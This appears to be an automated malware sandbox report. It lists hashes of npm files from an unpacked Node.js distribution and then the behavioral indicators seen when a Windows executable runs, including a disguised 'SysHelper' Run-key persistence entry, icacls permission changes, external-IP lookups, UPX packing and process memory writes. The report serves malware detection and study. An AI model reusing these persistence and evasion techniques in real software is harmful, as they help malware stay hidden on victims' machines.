SHA512 2d02be4754606d29732356133cc35c7f936027346977cee91adafafdb0546712804062a57489726de4803eec863c0ca7118560c0546c6797c7b66659b013290b

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\isstream\package.json

MD5 6f494eae7a76f50dc695e640b0b31b7d
SHA1 2c0633c2f92eaca7baec4ae9b141aa1f2ff2e147
SHA256 90185787b5f32fca6c5fb2b7d5cd6d041ab9ecc0124f669e89e69286e9043134
SHA512 905258bea60f56230cf556c8119e6bde8d6056b321faf9a531e86009d96e91aac030da5df9afa25e66cd41ea6bc1de7bdf5fa8e8904914bcb0d6a818272918bb

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\isstream\LICENSE.md

MD5 c282c667c820d67c0bbdbd368a73da02
SHA1 9550161cda20750936202fc2603b1b17cba35a1e
SHA256 d0900bb9434c28219e279ff96621be3ae80bd9d048b6ef1e72f3ebbd6f715ac3
SHA512 164ed2f5abcc56ba23ef76fe5fd96461badfac645fbfc5902c7a34b968ad1bf39d609c2511ba3fd8f6984a60f5f0fdb5b9af1b3e4af34554f012cf023e6a2560

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\isstream\isstream.js

MD5 ec4af7a377eacbcfb18a50418931e2d5
SHA1 51738949fca35bd21b967014b0fc65f2d4703fd9
SHA256 1dccbcda52a77f1526dd5997e7a1757d156f0a2f6cca34159897a2523300c712
SHA512 e7a6a7e440972be3bb08eca757c071d855ed409afcbb73d40a9cedba0a3bc9fd39c8c83096da4540e6318d5ba9283aac6a0790bf49a3259f7d545885d685a094

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\isstream\.travis.yml

MD5 03562b1af5bc7f3871306593fc382cd4
SHA1 6748bb2604f42267f26db6abdaf16efddd0d229a
SHA256 ef18c602a399eb60d775e59016dd1638135bbc041243deedf4b32a312f4b90f0
SHA512 f498209fa9366087fd9d1f229aad8c2bcf958bd396384de9513a04cc7ca954c43b601cb01e94b10998fb16431ec9ed0067d3eed4a54b7d3deb86f9bdbcdb6a67

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\isstream\.npmignore

MD5 4ffd22827395ad170344488f55697eff
SHA1 e95a8ac9fd0eb253971eaed43d3f3b2ab1331927
SHA256 186718169bba94dd69dae57bd23fb465a33b2d7bdc2dbb8f5bcf2dc5d1d2a056
SHA512 940a79ac6d69a0558d54993cfaabd8befa7074a7b0c60e83f483197c3dd808f11ff80db81ea03a866a10080ee3d4691c1f9d9a1ca409cd5ebfad1971b07b3755

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\isexe\windows.js

MD5 24e3dda80775a1dfe78e397fc1bc9413
SHA1 4861d1f2c241effe508a42278ffc654efe637453
SHA256 ed5bd171e54a26d1b0ac536851b6b2d242a598e62b791d922a3b910236ea1a1a
SHA512 a65d3f63f6482246b295d589e581e37335535d77c2c605d277179976e50f519db068bef0d7730cb5573b4d23da6c8e777b914b1f1453c84a9878d8deeb4453b9

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\libnpmconfig\node_modules\p-locate\readme.md

MD5 ad1b5eb638d2ddfdd1b1872c810dee5b
SHA1 c6bd0dc99d4944bb20cc0722320c9afca61225d2
SHA256 7ecb7adc95c678a99eb73f9454aced39ce02ee6d0554e9284e31cb62972abd03
SHA512 eb6d5c64b7cd080ce9fe32fe19116dad54614ad592bfc285e52cca6b4922f1d3c7c4f5e1a6a494e1451dec3d9c54c161aaf4126b162ae0a183e5332e2df6d828

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\lockfile\gen-changelog.sh

MD5 cad7c47fc486f6975ed7e824de941366
SHA1 07a2fc74ef27c060c227e85e174f5e138661f15f
SHA256 b2d7120dd87c94a4e5c745693aee88bc8bc5c14161b54b2a426c308bcfb7a934
SHA512 3c17cf976082470d2d3b2172fdc63d0bcaf19ee095781e84f802cfc65124bcddbd7ca6b940fb36f08b19222aa6a790c2140116bead44605b910d00f6f0d39181

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\lockfile\CHANGELOG.md

MD5 c6f6380fc678d41b5aa1233bf526f2f9
SHA1 ab6838fa5e929b44c3f74c490a70831e821792e9
SHA256 c8c2f87ebec46b276c0885673986bf639606ee07d0b52d1dcc1910a4f7942487
SHA512 61a4c3604877002cf8eb72da4db6bd72aa8430d93cc304342f418417919025859c369bab957f325e7837707c42c9061736b82996ba27c910ece0232a8c114ea8

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\lockfile\.travis.yml

MD5 1d27c7a8335cb1d0c63d3fe71e0e7b00
SHA1 a6780b1a64256a925de9e1dca9959c962f119e5f
SHA256 fdd2e738c72cb24fd68cebf1dab57ddf0ee00a0d853f76b4d0a6b3d1935413b6
SHA512 e9fc38f3f83e54ad2dcbe379317a5eec735c9c2b56e8cf7924a0751f1f17d79531bd8f85369010a463813fd5704176330ef8cd18249792421a1cbc1c6a52aab7

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\lock-verify\README.md

MD5 a39c328c1331a33f7e3662e1bcf11811
SHA1 1bce54d34a7cb344b6b165aa57218b1a49c8a9c4
SHA256 945e68fea5f8b6510c9ef77b739cbff326a29e5b0c16da0c92848dd8d16b52f8
SHA512 d75c4ebe4e0aafe916c0914c0c1d2f82fae8871a74abf780df3cdeabb891c73cdaa7246a01d9e65ab2e81dd5dd723dcb9e9afd0b42b07f48a1bb4a798f49b1d5

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\mime-db\LICENSE

MD5 19447f8ddcf279b8676ee1bdfc939091
SHA1 0608edaad32967533e31f9557ec105968bbc6606
SHA256 c2ef03a8b3062a1e45fe7190a5ce080a59290761b933f871c286edcb6504a0ae
SHA512 c82c03f5cf13adb1237e19ebdfe44eced3cacd371601891c254cfb96af15523b98c4d7dafa84f6c1b3745faed04d7d2e27f4b24fe758b76ab4963305c6e02b60

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\mississippi\license

MD5 40944421a4b5820a0bb5d9fd04f577ee
SHA1 fa880e925f500316de6f61d101ed29e719d48c8b
SHA256 22b5410fadfd6c5206dd517984d7b4d642d8e4f090e226f6c7d7f0e32714ac83
SHA512 a0d2bcf3c871896f10a95aa73b836068e96f23c9db51b35b94e83136bdd599ecd4022688bb4a04f4949bb5ba29bdfb4c1a164e15021c41e869130078b090d3cc

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\mississippi\index.js

MD5 49fc36dc35e86ee4bc8dca7f03db33e9
SHA1 fb07ccb7fccbb6d03d4a6f05a9114013a0b3e1aa
SHA256 55bfca79e6cd5263a83fbc3a9deb581a5e59833fccb157357c4934d510425e75
SHA512 35e1f5641148b74527bee66f44ebab3ad0669e534d8dde4571b255ff76d6762d7ebeca0bf773f8a9df9aec4d592a86720d24252602a9ad6fd95d3aa29f887dc9

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\mississippi\changelog.md

MD5 b585db1ec4270fe4afa2663ac7eaad93
SHA1 eaa58984cec27fcf3a316c39aca07049a5b9e8fe
SHA256 e32a5f09c4113dc2e9b11c711eabd70f23813e0b30701c7b768d352414f3d2e1
SHA512 dcf2ab36574197ee98ce5c84962ce5af3ba4ee3124a301d35a47d9c5785eb0d7b21277624296b98df102088d6f3bbf69086c51ae1607725f791baefa699aeae8

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\minizlib\README.md

MD5 85deab85e6fe257498e8e2498448fa2d
SHA1 b482845528f465e7936e10efeb67956a42d1bc39
SHA256 c9e7bb5506f799efb8ca0e8a283887b3f4ce285746b1116078685d4751321ab8
SHA512 e8b1bccd8106af23c762bd6b7fd69339e51fb5dc99d4eb5dd50af8225b44fed491fdb2730e4e4ededf0fe6b6dfde7e7a0ba1c8a9d0f0ac97620ac5edbedf1444

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\minizlib\package.json

MD5 fd44fe57795f8d453e2f7fda60f6bb71
SHA1 ecd6cd70f86e033ca8eb0865ce3c0e696030b307
SHA256 ba24a797494c07c578ccce837bed686d05e266404df97f45632a0154466a399f
SHA512 2f3c1e050cfe672980ceaf8a5cd8dc56bfb08fa61ed81d6b2d1b63c4c4cd2aa6cfd089f4cd594b04e64ba9aae772224370c4071cc88a747b86998f93fc6e1848

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\minizlib\node_modules\minipass\package.json

MD5 d0907bdd307547012c461ccb58bebb0f
SHA1 2eb58c6784b9059954afe21afa409f559b51978d
SHA256 79168a877779d610bb720d91bae857dc99f11f764326d70d8030041faadf0dac
SHA512 c0dd8b190f1de9bf9c9b5c4d8d143752013ae11fccd3c42092eddaac15929245256812b46bd792ee37801713164c455d65336329577a573d8993f802b4942a98

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\minizlib\LICENSE

MD5 89fa9dee7ddbbf927dad6360595b9522
SHA1 cb0a7d2e3f1aeeb32bd403551ad909f89bd57ff9
SHA256 f7b1836544aad288a3eb30e1d6c41e9522572699d1ad2028d971ea93de44bc32
SHA512 abc2b940e7dc4c616ecb730b621df666f31235ca780598a6444cabe71d92b3406d19c2ebd8b33ee7080dd5f41fe61b0cdd297b556e7b258bf84bb1361667fc33

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\minizlib\index.js

MD5 60301381da05a85608b08c5fb2eba0e7
SHA1 ec89eae6a9f22e39eaa5019ac6fa3d41e9006edd
SHA256 662957e7cdfeab848652c654147acf202b8ad04ac7ea5677db6d97c90b8640c7
SHA512 9b29a28a60e72a64282f76f2de4af129fb219e49fe88302bf9d1fd977295361cd2a6acd09ebd399d956daae319ae915ab0f1890c5a45f7e74b68724603212e9d

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\minizlib\constants.js

MD5 23ee85502880cfbc2f205bdf15461ca7
SHA1 ad8afde6073fd8e9ce1bc7e90a77b95c9746677a
SHA256 2c8b3869ab95b226b24d7cc6af62521558fc4fbc871b0f91b4dfeff54bafb848
SHA512 96763d58aef41ca566276bcdd444db943176c340ad87555ff441ae893b5dd527ee27b20bdbca782504ef139ea5138589064dd8afcb0c934dee02a46b872f1cc1

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\minimatch\README.md

MD5 8b4af679d35806623edc4207160f94de
SHA1 46fc818e8b1155860a3ee08b500ab34ac3eea96e
SHA256 608905c989f7e4fdcae7b27ab050caa7cb26e1d81f47bbbd25ab835fdc04750c
SHA512 db62a19736818c5dbf6ea78122980393359e3fd470425b1eb30680037354a9955cc18f7a9a72c2289250d110087159f6e4e07723ea2fc550f2b92dd4e1cf12b2

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\minimatch\package.json

MD5 e4ff3374af59dd7bdd1d38052e40867c
SHA1 d02d940203ee9cb9909a4b6e6e4cc763acbb48a4
SHA256 bb4d672e60ef594fb31fe7f8c3e9c32d17c80ebe753518c93628bfc5589e3b68
SHA512 bd6c85d11a1fbf05c6bb49c4980ba62bd704ef2fee4bb810a1c52982b33bb4922dc6162564cc37f55325abeb44337472a91ebd2715bf5da8d9d2956bfced422a

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\minimatch\minimatch.js

MD5 dfc85d013bcf3a5607f2de2c7ec0c389
SHA1 45d1dac9278f922b7823bd64aa340c686dc75a12
SHA256 15ff81144a9fe3e9ac9a7e138140a798c528acef0491b2076e0bf65ca09e1bce
SHA512 65dcb6fbd4691bbf4a2941fe5ffe723f95d725dc8731fd3d71ff2b0a8faefd0782ef767c4c631e03af8b97adbb6c712c48135e7a7733977772ee2edd79195e3b

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\mime-types\README.md

MD5 ec293b105f8f27545284b9332b191e96
SHA1 1d949a1b380ecc23a0687fd87f081d708e0483aa
SHA256 e4308c8a10147aab0df6ed2e7f86cdebcfc1f24f71e6a186b8f6fb17ad5e2e69
SHA512 c20b6bd1482539ad1c4bdb2eea06767373d80de559f5e57aca0232ceca8b536f08c1d093d97f42fd90076a09b4d23bb11d41d8bb157d67297258351b8fa31e40

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\mime-types\package.json

MD5 aa074b51c908920154571aec31a7819c
SHA1 e39c2e70428751947d86ee1ba97a32195e78cb58
SHA256 82fe440836a71b3b3595b7897c02e0d000ae6465080a59fe9e9964c26adb30f0
SHA512 2ff9dc37eb53107373fc0f025e413dea70d5d50692e076317c26841d9dd220eab97c52e23ed9456251856d5977347dfe93aaa1392c19e3a587f89bee887c0657

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\mime-types\LICENSE

MD5 4eab6843245537b49541a7f103c2ecf0
SHA1 a3812f9b96377114eaff74eb8dfb271042c61b3c
SHA256 db504e84743293a687fedb6f16a03d71121c54bdb2bea2e018ad7220c84ba69f
SHA512 9032b833553a2e19376d11ae0303b60e3e0d49a9977b1f80050a4f2f9ce70358bf3b2bc86fe748ac5007f4eea8d14b5855f7fd8b4d476dd7f2e546a3913dab9c

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\mime-types\index.js

MD5 46ef7926b08857c43f28effdbe29bb1a
SHA1 3cf07110597dc57987f78debefdfb673eda94311
SHA256 c7ab5bed05f4b98bd9e8eba95ee84182110dcdc41c2562f7613ef38dc8715da5
SHA512 9fb72948f449c41c24e8aa380fc0986dd911ef9bfe287a70e52a798595636aa24a0931ee474540db4e3215fcc2294ce6b5ce24ae1f1d116abca972f6b6e1cdf1

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\mime-types\HISTORY.md

MD5 efcd38b7ef2df2398394c58bd49f297a
SHA1 1dba1570e864017d65d89659c07c0a3194382fa4
SHA256 1693a444deb5875fe22b85ce8b03757af2d7545d4bd398b2e99383b229887532
SHA512 7385566718512249e04b7e06b6e0e03486827b8c92419988c964ac4da847f222b6a2e67508068d420ea9fc656b8d5679a719bef439462dbdd01244dff56f8522

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\mime-db\README.md

MD5 1514ded2a83322e056528f9cd4a4951c
SHA1 300cfcbc089ca38f41d14c5cbaa62efdd1e4e6d5
SHA256 603c83269b5681290197cea4492af693bd53feb2753d7ed765f904de0d84a655
SHA512 9eb588f0def7484ab106981bb1f62e7946e1d222b2f2a1a3203ea1ddc7afc1e8a338a1667fd8b1a142e8cb6a418af8d175e8936e7e886bc2e48fd4cff4314da2

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\mime-db\package.json

MD5 92e55f4b4a76e04905d0d886f6e9feda
SHA1 34dd38f292a2050d18a49cabed6780f88d959acf
SHA256 835ccddb24e6ffc8c76666cf1a05f2984f35893a73966c191b8df1e6e83ae88b
SHA512 25f59619dfa025d482313da35c42328885c5d679334b4be42635e48fcd977932494209020c3aee0ed5ed15dd908120d3ea89b0fa51fc046c3818076ee04f2d16

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\flock_tool.py

MD5 46334b8fbf8d73b2d85c82ed4c267ea6
SHA1 1a36902b7ccab19727d0c6fe9dfb8c485bf7e4fc
SHA256 ed2df68c085d2be7a14cd7f58fcd1a36d950fc46eaf0500762bdfe6c39317f4b
SHA512 908a336d719ef2f8178ff49267dc4f5c5e280461184bdece93bb078d1cd71c2c8ee09ba7c4d62950c8b12ba5af8f59c18dfa5c04af99d42e7187a7807e6204a3

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\node-gyp\lib\find-node-directory.js

MD5 a22b882b1d66dfd7b69f96a570eb1b3a
SHA1 d098907567515816c61d96d5ce7e8186ae697433
SHA256 a64dad9b261f88b4409b0686edd41c08fd4f17af0dc79f1c499e7d379bbf5020
SHA512 a824436528d23ee6418582d8fa7331ac9c15c21ca19dd560a5877b7f5aedb8f13ad133d5fcd405aff30eaa58e496bd86768a3b247cafdfdc8aa7080b23a14669

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\nopt\CHANGELOG.md

MD5 987e78a6555a578885a2cd95d3519f04
SHA1 18f8d68902f7864a72575ddc2a4737d0191d3e03
SHA256 ef8eed39bf64a8ee84af182a5b3a40c0d2f15fe5dfab7d682a2d153bb6fc5910
SHA512 6d45d6f4ddd1dc57ed5f484d3cdf396fa0a842554686aac54326331d12ba8ec65deedd44accfc15654fcd5670e5de3e7916960e5fe5936e085fdf328c051f301

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\npm-user-validate\README.md

MD5 69312ef0dd69be8cba72c76a30bb55e8
SHA1 b8d9dee26e5f5e0f552e05e040081bfee8ff9022
SHA256 0ffa70a58e405adfa58f4c939f67e1051566c15e793440ea86a185125f27d6bd
SHA512 b681a07118258ff0c46c23480b3432fbaad3161bcfec7dc60249538ff8d788b1749f5b2c4a1f9693ebcaeae799404ce27e17213502c5ae47cddea1441908ecd3

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\os-homedir\index.js

MD5 e92c11ea6648df3ac973902e64ce6472
SHA1 eaa48ebb64997d99fe09d07e1602c78aa0d5e7ca
SHA256 a2d4df42699479c286d280699e6a44ff83272dae79501596041c03792a847d9f
SHA512 8c35080ecf8f832c096790054f373974aee30bce9ce923c02dccc36ae8b3227411907acf7834e5120d3ebaff19ab44c5a6c7f95624e96178377f2a2f1ff81fa0

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\pacote\lib\fetchers\hosted.js

MD5 97e3c4e732a984eaf7a42f6417b979ad
SHA1 8a7c1055593c6812c8509823d6362cb453c7a68d
SHA256 41ed11a4531396feeb4d82dcbf24972f29b7f29045ac8d255e31c8a8f7b469fb
SHA512 ad4bff03f5936d625fa79585bd9ced6db065a1d86ef6379681a1f070ce46a7f2976f3686ab78229ada7e0ae02d974ccd965257ada8a8e5abeeb984c61dfc8146

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\promise-retry\node_modules\retry\package.json

MD5 28391ff295455e934ceb86e210983a1f
SHA1 aa3a9acb2b7fca55a4aaa4df7b5ab99cb202e6f7
SHA256 c793f01fa9f5f3640fbcd9e41264687984522b68d91b4edced025084610040ec
SHA512 02128e1961356be7d4a284c6ea5a0b93ba391d5916548d6c440b2ec8df3402b7eb0e41c725292c63cc80f0c7a67a38e141070c89e71529d25ec1c1b01dc0ca03

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\prr\.travis.yml

MD5 fb110a924b6e74453993de418762046b
SHA1 b48d85ddbf85a61cc28c348ab669b05ed9585cf8
SHA256 bf0093b93247528585103193315a6725b9afd319c53c212e5883498367fd57b5
SHA512 3b503ad0f5709ef3365a45539d6eaff02b07ffb1756af21acb74c499dd7e9971eb90c3dba1d320c01299beb44f91a1ecdec288791187d55324c00857b7ef3e55

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\protoduck\README.md

MD5 c252865c127c38ac1b50349f6b7645b1
SHA1 3b0b89cfea16638eff740d1aea9c881216b5ac6d
SHA256 ee847876fb9e83bf09124c83783c6bf5eba2b0367d6b9470e66e8c7b18db1476
SHA512 0e17e4f5d61bff3ef0141f2feecb28661068baa6b3f1c8af56989b60ae590275e85d0851baf3b08d8e5034dcc538324382707231ee7e16617f39cd82ca8dc35d

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\qrcode-terminal\example\basic.js

MD5 46b7e4efd1f10946c3dc99dc257275ca
SHA1 82bc2716dcf621986d36b636c13b142a1cd0f7ba
SHA256 99511b8aac86c4d5088aeedec93cf9bb840d1319c2a8858b412d4c7c57ca8b1b
SHA512 9b22a86f3e1d7677eddddf0cd0ac91132a8f6a9f490af7f5f65056449b0a04d2da7351f68bf315314f5ac1307e1af6a32e8c64ab2bd8d04a18e24221403359f1

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\qrcode-terminal\bin\qrcode-terminal.js

MD5 25bffe0af21d22ea436368ad20bdbee7
SHA1 49194df2150e04241a24b801780116291ee39d93
SHA256 9191760030b149f4828b803e0ff0467095682806c45f0bdb00b549a568b656d2
SHA512 6548f175f933a748318cc80730a867ce5c15b1abb5bf9013569b464e714d41964818613891aa38b4e4c52926a025682695aecbd20530158817a023460488de41

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\read\package.json

MD5 8c4db01e304b7bc7b7bc60397ebce8df
SHA1 144c3ebb0eab07edd577308c17192fb2de7186f7
SHA256 a08f0083523ae8cff5977d9727b91306050c474785335b32a943e1be2d915bf0
SHA512 46cef62acfb477dfaf5665bf0c09751b03247111e47a6d1667748a88e132311fe69801120ec801d7a30cb96ce212463d75afd5b81974d7614606a9fedc3d7fb1

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\signal-exit\LICENSE.txt

MD5 dce2e462f8556ca438ddc5696b9f78aa
SHA1 fffdb371a16d3436384578bde2a747d54878962d
SHA256 4f04b13a1e2dc96e26a0fc278581fee4ae7e25a5da2d7b07f692ebe8a8a69635
SHA512 1a2d8780ecd080d22fd2d084ecbec3de42f6c0257f0c63ac01ec6aa415a5965a36648d692cec6934c87ff6c40d6dc9a5ef2ebc4694d8c10fc85d364f6a4a023c

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\signal-exit\index.js

MD5 f65c9bd39be06c710cdc4beca210fef3
SHA1 3ae9fd5d76f57ea5a455b7de720aafff1e22f724
SHA256 f0cc0985d4677d6532a0146c2131eee3ba68b94391d5969051f787b36ea7c2cc
SHA512 d2b3108e1531b1dcd5ec5e72497bbeaef2c7804c005a504b0ac54ccd931aaddfc343be693364e0636db271370dd481e3f6cb77e4f99e2125716dbe58d4e38c4d

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\sorted-union-stream\node_modules\readable-stream\lib\_stream_readable.js

MD5 714c17396a49f2f6a1677a5632c4cc43
SHA1 bb92f8c6b45042a2680443d8da6500b51d404001
SHA256 0565f72b6bfe58a3eca29fd0cbae483fbd931f3db4983e284c2540abc22550be
SHA512 f10a2e9f04eed7c497caadc16a5707dde0cef8bfd914df9169fca4a60d1f76da9e8d17bdec3e75d4cee098bd0d863a747fe5e4b27a9d2513789c588501b4c81f

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\stream-iterate\node_modules\readable-stream\package.json

MD5 01fcc8824d0ff2523291ae0757c58772
SHA1 e24a31ba6d07176c816daa3c5ff84bdd5065cb04
SHA256 ea068e22ad961c966a5a6759ee2ea2ef4bc7431a821acb0fcb173728ecc47b7c
SHA512 74cfe7a89006e859ac5b0cdad0109ca2d9e04a8fc7143fc4460ed22657599db3fdd2894c2e809344a8f80a44c819caa8f67291324fc4e71f54ffc3367faf525c

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\stream-iterate\index.js

MD5 9495cfe42e3baa9753878606f4fdb842
SHA1 86c317b4e5f11c8592594f1487ad5945abd5a246
SHA256 437797764af1eff3448d9140606227c4be272cfb74891f7028ec2765cd15862b
SHA512 849ee12b7fc462eb4c23eb105efceb5a8bf0765c2db523fc04139d3d0429fb0196c634aeae4fef8acbe21e5ab131bd34f61afe124368cadab12b5a92a09d1613

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp624896613850\node-v13.13.0-win-x64\node_modules\npm\node_modules\stream-iterate\.travis.yml

MD5 94d628cc0ab3866344b4751c447b3a23
SHA1 590b529db1a90a24028d0c54148532d3618d0836
SHA256 e0a0afea4c3f8e02bd815a7adf6f84cc3c6b0d729de561109535060289511fac
SHA512 0e43819b73fedfb3b7d2298c5f699db0ee9688e5ea31b64665b7b27546d4ea936aeb8b248e078b0c04b94c3d0b0bfb59f9b0fec07e9943a1e446e4faca946939

Analysis: behavioral17

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win7-20240903-en

Max time kernel

143s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe"

Signatures

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\fd7cb3b1-643e-450d-b653-e142b5d81a51\\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2392 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Windows\SysWOW64\icacls.exe
